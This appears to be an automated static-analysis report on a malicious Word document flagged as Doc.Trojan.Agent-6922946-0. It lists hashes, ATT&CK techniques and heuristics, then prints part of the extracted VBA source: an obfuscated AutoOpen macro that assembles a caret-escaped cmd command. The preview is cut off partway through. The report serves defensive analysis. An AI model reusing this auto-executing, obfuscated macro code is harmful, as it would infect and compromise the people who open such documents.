Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0dbd38d7502e2fc3…

MALICIOUS

Office (OLE)

Size: 93.1 KB
Created: 2018-09-28 07:53:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 54efa3a21c4500a6f2bd0039615e2875
SHA-1: 93fea75d5c2073ae56df6cd128240a9762f57200
SHA-256: 0dbd38d7502e2fc3e11651495fe95b40e6f6590e93784831950fa24477728c68
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains a critical heuristic firing for a Shell() call within VBA macros, indicating the execution of arbitrary commands. The AutoOpen macro is present, which is a common technique for automatically executing malicious code upon opening the document. The ClamAV detection further confirms the malicious nature of the file, identifying it as Doc.Trojan.Agent-6922946-0.

Heuristics (6)

  • ClamAV: Doc.Trojan.Agent-6922946-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Agent-6922946-0
  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 37092 bytes
SHA-256: 6ecec73798629a8b5baf4e6aab5ad8e856a6e1461bf49cbc8cc704514561f18d

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "AwCiUoUS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim BVquq(2)
BVquq(0) = InStr(HEtZZ + LjOtViCBATtaVBpdWR + mZaZNO, ECRSi + EnlwTqajKjisqlNRbTui + MvOdfbwf) + InStrRev(qkTibMO + hfwUILEMPGKFRvMjAj + RzFFS, PEATnIPa + zWkPUaTIWjziucfVDFNVW + KliCr) + Right(OANzn + UmKMJPGnpfkEmANPT + pGfLsTtS, 952) + InStr(wiTDIMk + woWHPBNMmYUwDhw + MVsqB, tjrAio + BkYvofFLQFozbOObr + fGHkIiUl)
BVquq(1) = InStr(wTvTJCim + jZvTFWQmQNUYFoEIBkZ + subjSL, KNPFKnil + zdabvPrOidfiHbLvDzak + KpwHA) + InStrRev(GjasrQ + RbzBLfiChMTqYtBSk + jOEGYw, mLMJm + jNibhvaFfQYBzqwAsjwFGk + uAHhElvK)
   Dim ISUJZz(2)
ISUJZz(0) = InStrRev(ZiLwN + mdtmHXFEfnwwLmCKFSfiJz + KwjwnJIS, YjQRM + mAbwmYWDsFGukodIYhAopt + QVtoF) + Right(XwDBX + EjQCLRjDrjDlLlDITFY + ArpMr, 496) + Right(kOcQY + QmhSCECHlkRwOjaLCU + rdUaT, 573) + Left(nwWshY + AzUiaIZufKMkMshqpi + snRzSbW, 452)
ISUJZz(1) = Right(TKFzpik + fnTXiaOJzhQYXOcuqzXIf + BiMCDF, 398) + Left(vZPmWDRW + KvnqXvUazHfnBIYzwcvkZTC + nmjBkh, 216) + Left(opHifq + PlNizTUZVPLOWVQsRGvGqhK + pOwFu, 666) + InStrRev(QspSLb + vPzSUkswZjUfXYNjMZKR + EzFzZF, uuSLcnw + HUwjlvDuzrwmlzPqivY + ikcib)
   Dim kiUCwh(2)
kiUCwh(0) = InStrRev(GJtiHn + ITsdXzIiAtQQcwX + RjBmQw, BtLRsb + jSDcjUvnhRRjkjcqZR + aXdHo) + Right(JZzFtjU + GOGwjiukNblQltFcFFEfG + ssnYzP, 46) + InStr(LLHcvcB + NqsnDMPrYXBiznCpLOMjR + hWdhcEh, VfFoaIYX + icMTRJaLMAGbftzKwT + FRjjOOD) + Left(FrSGUCLX + VssODSTubNhGOwkcLzI + BjUOK, 834)
kiUCwh(1) = InStr(ucwlMDc + ToObYkDIAbvqtNNUwEkXp + iPNtwIP, TIlczQG + KrEikPfpOqjRYGovUBTf + tNvkVi) + Right(jijivizN + AZuCjlrsKbprLfSkFnfs + uQDLJzH, 858) + InStr(zVrdKtc + MqnYDcnvDMUhwRphSNUwXff + ZZMKZFiu, AiVCdpHL + ZnqFvostPsXfDqBvcP + cnwzKqH) + InStrRev(NZaljH + fqArAcDjZwFQpHNRwqP + wYKFNkU, KzZXrcL + iRJLDXYjVqSuOscSzTvF + GsiiNl)
   Dim YpHUn(2)
YpHUn(0) = InStrRev(wXOod + IlZGjsMAtJWtAPNJTJ + mQWkPl, XDUkG + hoNMpOKZjFWzbsBXmq + caOkmM) + InStr(mMijVGz + cswDJOmhscijBUklaiY + tSKRuzEu, KwQQSL + jUBDDsMBVMEhAKqE + DohwLrr)
YpHUn(1) = InStr(Sawap + qPwZiwiiCFQQGbGIjUFsUAJ + msuOq, bGuEFG + IlanzTqJJKakWZAiwBH + KmzAOM) + Left(WBkjZV + SClFjiFcUiEbBuAcLq + wjkEjmu, 997)
ABwNzMruRnFvs (KeyString(kkcnUmn + wtSQh + 19 + 12 + 36 + wAsww + uqzfk) + kkRTfD + HjKiq + KeyString(BpLzVP + CiBZiw + 22 + 14 + 41 + DumOJ + BhXtsMnR) + USwdjcjo + HwNdoGvChP + dwWltf + YthVwUwj)
   Dim tnXAa(1)
tnXAa(0) = InStr(vaASiU + LXEdIwIvuimjlCEb + tdYiPz, cqYGS + tGhRwfbGZHIqPQdtRufvsJrG + KIwAm) + Left(XKOiRWhI + OnMNipcUOKoHEChRLI + TFjCHA, 455)
   Dim kUcTGq(2)
kUcTGq(0) = InStrRev(Tfjdmj + JITzrjKOsHvmUPXEncFB + wrdUv, htzrDw + oREOikfwENOiOGHwsF + TLlOtXcb) + InStrRev(RzKAndR + SPhSrSLswADhlbkWmbidwmN + ETdjZM, mstvhir + YjNjQkvhRjmljooRTT + BzwKDa)
kUcTGq(1) = Right(qzjOdBon + lsvApBMPtqaLzuOMZcUcVt + RABAA, 667) + InStrRev(lZBKwwo + FQnjUpFVIUQGBwuPqs + oPIoLYVb, RPdzWzl + faCRWzuIEZrSQTLaijAhf + LdCaziiw) + InStrRev(mzmpQP + PvwwEzlKhOinYoQGa + MWFGNWZl, fKPizM + YLTwhZPKOBAJUicswm + ZUzzi) + InStr(YbrCC + QoahwLLNIluvzXQszuckj + FpZIG, tSoSRo + pGoNnLFBRlKvhtqqGW + BtaCj)
   Dim IcYzE(2)
IcYzE(0) = Left(TDwzoQqU + LfkZbwdiAmTNSHIJlv + HamuHh, 876) + InStrRev(MBqBwah + WaUJzmaWJhLvcdzoEFw + FHMTXTj, aZCzwaz + LkiWQYHUbtaFZojdSDCcGjV + PfZqwYk) + InStr(iqoMi + hEUzNuhUodIqvVaYpC + jpofVCp, DWYbAD + lrWHvsbsuSmJianKZ + ffiJFl) + Left(vRGWDK + lNvEcHUKtTtAuTMLrZmW + dzBfnG, 865)
IcYzE(1) = Right(Bwddw + NwMSJiYMCrwzrojwHUp + avvKwQqP, 756) + InStrRev(nKoOP + SkPuIICozzRoYrNSYcw + LHkMjAS, sWmYfnnI + tSWtnMlAwtzWYnjpZoiOa + oAMaf)
End Sub


Attribute VB_Name = "TTJoNzzvDRnz"
Function USwdjcjo()
PvnXmiEiS = "d /V^:^O/C" + """" + "^s^e^t ^K^Zv^O=^ ^" + " ^ ^ ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^"
Dim VMlbFu(1)
VMlbFu(0) = InStr(AUzpIRTu + nECoMBwHoSnfqPmjTF + iIizqDQ, GOXEi + jiCnYWMpVSBjKXdhfiEGzq + hQmPM) + InStrRev(ApDRNLv + VlOOzlplKCRizfOfZ + GUtJh, FHjuwl + fIwiwdBVVQAUizCP
... (truncated)